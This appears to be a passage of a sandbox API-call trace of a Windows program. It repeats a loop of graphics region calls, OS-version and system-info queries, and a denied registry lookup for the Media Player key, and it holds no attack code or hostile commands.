0 [0087.856] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.856] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.856] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.857] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401d3 [0087.857] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401d6 [0087.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd8 [0087.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd9 [0087.857] CombineRgn (hrgnDst=0x1040cd8, hrgnSrc1=0xb20401d3, hrgnSrc2=0xb00401d6, iMode=1) returned 1 [0087.857] CombineRgn (hrgnDst=0x1040cd9, hrgnSrc1=0xb20401d3, hrgnSrc2=0xb00401d6, iMode=4) returned 2 [0087.857] CreateSolidBrush (color=0xff) returned 0x2100cd7 [0087.857] CreateSolidBrush (color=0xff0000) returned 0x1100cda [0087.857] DeleteObject (ho=0x1100cda) returned 1 [0087.857] DeleteObject (ho=0xb00401d6) returned 1 [0087.857] DeleteObject (ho=0xb20401d3) returned 1 [0087.857] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.857] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.857] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.857] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.857] BeginPath (hdc=0x0) returned 0 [0087.857] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.857] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.857] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.857] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.857] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401d6 [0087.857] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401d3 [0087.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdb [0087.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdc [0087.857] CombineRgn (hrgnDst=0x1040cdb, hrgnSrc1=0xb10401d6, hrgnSrc2=0xb30401d3, iMode=1) returned 1 [0087.857] CombineRgn (hrgnDst=0x1040cdc, hrgnSrc1=0xb10401d6, hrgnSrc2=0xb30401d3, iMode=4) returned 2 [0087.857] CreateSolidBrush (color=0xff) returned 0x2100cda [0087.857] CreateSolidBrush (color=0xff0000) returned 0x1100cdd [0087.857] DeleteObject (ho=0x1100cdd) returned 1 [0087.857] DeleteObject (ho=0xb30401d3) returned 1 [0087.857] DeleteObject (ho=0xb10401d6) returned 1 [0087.857] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.857] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.858] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.858] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.858] BeginPath (hdc=0x0) returned 0 [0087.858] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.858] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.858] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.858] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.858] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401d3 [0087.858] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401d6 [0087.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cde [0087.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdf [0087.858] CombineRgn (hrgnDst=0x1040cde, hrgnSrc1=0xb40401d3, hrgnSrc2=0xb20401d6, iMode=1) returned 1 [0087.858] CombineRgn (hrgnDst=0x1040cdf, hrgnSrc1=0xb40401d3, hrgnSrc2=0xb20401d6, iMode=4) returned 2 [0087.858] CreateSolidBrush (color=0xff) returned 0x2100cdd [0087.858] CreateSolidBrush (color=0xff0000) returned 0x1100ce0 [0087.858] DeleteObject (ho=0x1100ce0) returned 1 [0087.858] DeleteObject (ho=0xb20401d6) returned 1 [0087.858] DeleteObject (ho=0xb40401d3) returned 1 [0087.858] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.858] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.858] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.858] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.858] BeginPath (hdc=0x0) returned 0 [0087.858] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.858] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.858] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.859] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.891] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401d6 [0087.891] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401d3 [0087.891] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6b [0087.891] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6c [0087.891] CombineRgn (hrgnDst=0x1040d6b, hrgnSrc1=0xb30401d6, hrgnSrc2=0xb50401d3, iMode=1) returned 1 [0087.891] CombineRgn (hrgnDst=0x1040d6c, hrgnSrc1=0xb30401d6, hrgnSrc2=0xb50401d3, iMode=4) returned 2 [0087.892] CreateSolidBrush (color=0xff) returned 0x2100ce0 [0087.892] CreateSolidBrush (color=0xff0000) returned 0x1100d6d [0087.892] DeleteObject (ho=0x1100d6d) returned 1 [0087.892] DeleteObject (ho=0xb50401d3) returned 1 [0087.892] DeleteObject (ho=0xb30401d6) returned 1 [0087.892] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.892] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.892] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.892] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.892] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.892] BeginPath (hdc=0x0) returned 0 [0087.892] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.892] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.892] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.892] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.892] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.892] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.892] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.892] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.892] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401d3 [0087.892] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401d6 [0087.892] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6e [0087.892] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d6f [0087.892] CombineRgn (hrgnDst=0x1040d6e, hrgnSrc1=0xb60401d3, hrgnSrc2=0xb40401d6, iMode=1) returned 1 [0087.892] CombineRgn (hrgnDst=0x1040d6f, hrgnSrc1=0xb60401d3, hrgnSrc2=0xb40401d6, iMode=4) returned 2 [0087.892] CreateSolidBrush (color=0xff) returned 0x2100d6d [0087.892] CreateSolidBrush (color=0xff0000) returned 0x1100d70 [0087.892] DeleteObject (ho=0x1100d70) returned 1 [0087.892] DeleteObject (ho=0xb40401d6) returned 1 [0087.892] DeleteObject (ho=0xb60401d3) returned 1 [0087.892] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.892] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.892] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.892] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.892] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.892] BeginPath (hdc=0x0) returned 0 [0087.893] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.893] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.893] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.893] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.893] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.893] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.893] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.893] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.893] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401d6 [0087.893] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401d3 [0087.893] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d71 [0087.893] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d72 [0087.893] CombineRgn (hrgnDst=0x1040d71, hrgnSrc1=0xb50401d6, hrgnSrc2=0xb70401d3, iMode=1) returned 1 [0087.893] CombineRgn (hrgnDst=0x1040d72, hrgnSrc1=0xb50401d6, hrgnSrc2=0xb70401d3, iMode=4) returned 2 [0087.893] CreateSolidBrush (color=0xff) returned 0x2100d70 [0087.893] CreateSolidBrush (color=0xff0000) returned 0x1100d73 [0087.893] DeleteObject (ho=0x1100d73) returned 1 [0087.893] DeleteObject (ho=0xb70401d3) returned 1 [0087.893] DeleteObject (ho=0xb50401d6) returned 1 [0087.893] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.893] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.893] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.893] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.893] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.893] BeginPath (hdc=0x0) returned 0 [0087.893] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.893] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.893] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.893] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.893] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.893] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.893] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.893] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.893] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401d3 [0087.894] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401d6 [0087.894] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d74 [0087.894] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d75 [0087.894] CombineRgn (hrgnDst=0x1040d74, hrgnSrc1=0xb80401d3, hrgnSrc2=0xb60401d6, iMode=1) returned 1 [0087.894] CombineRgn (hrgnDst=0x1040d75, hrgnSrc1=0xb80401d3, hrgnSrc2=0xb60401d6, iMode=4) returned 2 [0087.894] CreateSolidBrush (color=0xff) returned 0x2100d73 [0087.894] CreateSolidBrush (color=0xff0000) returned 0x1100d76 [0087.894] DeleteObject (ho=0x1100d76) returned 1 [0087.894] DeleteObject (ho=0xb60401d6) returned 1 [0087.894] DeleteObject (ho=0xb80401d3) returned 1 [0087.894] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.894] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.894] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.894] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.894] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.894] BeginPath (hdc=0x0) returned 0 [0087.894] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.894] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.894] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.894] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.894] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.894] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.894] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.894] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.894] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401d6 [0087.894] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401d3 [0087.894] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d77 [0087.894] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d78 [0087.894] CombineRgn (hrgnDst=0x1040d77, hrgnSrc1=0xb70401d6, hrgnSrc2=0xb90401d3, iMode=1) returned 1 [0087.894] CombineRgn (hrgnDst=0x1040d78, hrgnSrc1=0xb70401d6, hrgnSrc2=0xb90401d3, iMode=4) returned 2 [0087.894] CreateSolidBrush (color=0xff) returned 0x2100d76 [0087.894] CreateSolidBrush (color=0xff0000) returned 0x1100d79 [0087.894] DeleteObject (ho=0x1100d79) returned 1 [0087.894] DeleteObject (ho=0xb90401d3) returned 1 [0087.894] DeleteObject (ho=0xb70401d6) returned 1 [0087.894] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.894] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.895] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.895] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.895] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.895] BeginPath (hdc=0x0) returned 0 [0087.895] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.895] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.895] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.895] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.895] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.895] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.895] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.895] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.895] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401d3 [0087.895] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401d6 [0087.895] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7a [0087.895] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7b [0087.895] CombineRgn (hrgnDst=0x1040d7a, hrgnSrc1=0xba0401d3, hrgnSrc2=0xb80401d6, iMode=1) returned 1 [0087.895] CombineRgn (hrgnDst=0x1040d7b, hrgnSrc1=0xba0401d3, hrgnSrc2=0xb80401d6, iMode=4) returned 2 [0087.895] CreateSolidBrush (color=0xff) returned 0x2100d79 [0087.895] CreateSolidBrush (color=0xff0000) returned 0x1100d7c [0087.895] DeleteObject (ho=0x1100d7c) returned 1 [0087.895] DeleteObject (ho=0xb80401d6) returned 1 [0087.895] DeleteObject (ho=0xba0401d3) returned 1 [0087.895] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.895] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.895] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.895] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.895] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.895] BeginPath (hdc=0x0) returned 0 [0087.895] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.895] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.895] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.895] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.895] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.895] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.895] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.896] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.896] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401d6 [0087.896] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401d3 [0087.896] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7d [0087.896] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d7e [0087.896] CombineRgn (hrgnDst=0x1040d7d, hrgnSrc1=0xb90401d6, hrgnSrc2=0xbb0401d3, iMode=1) returned 1 [0087.896] CombineRgn (hrgnDst=0x1040d7e, 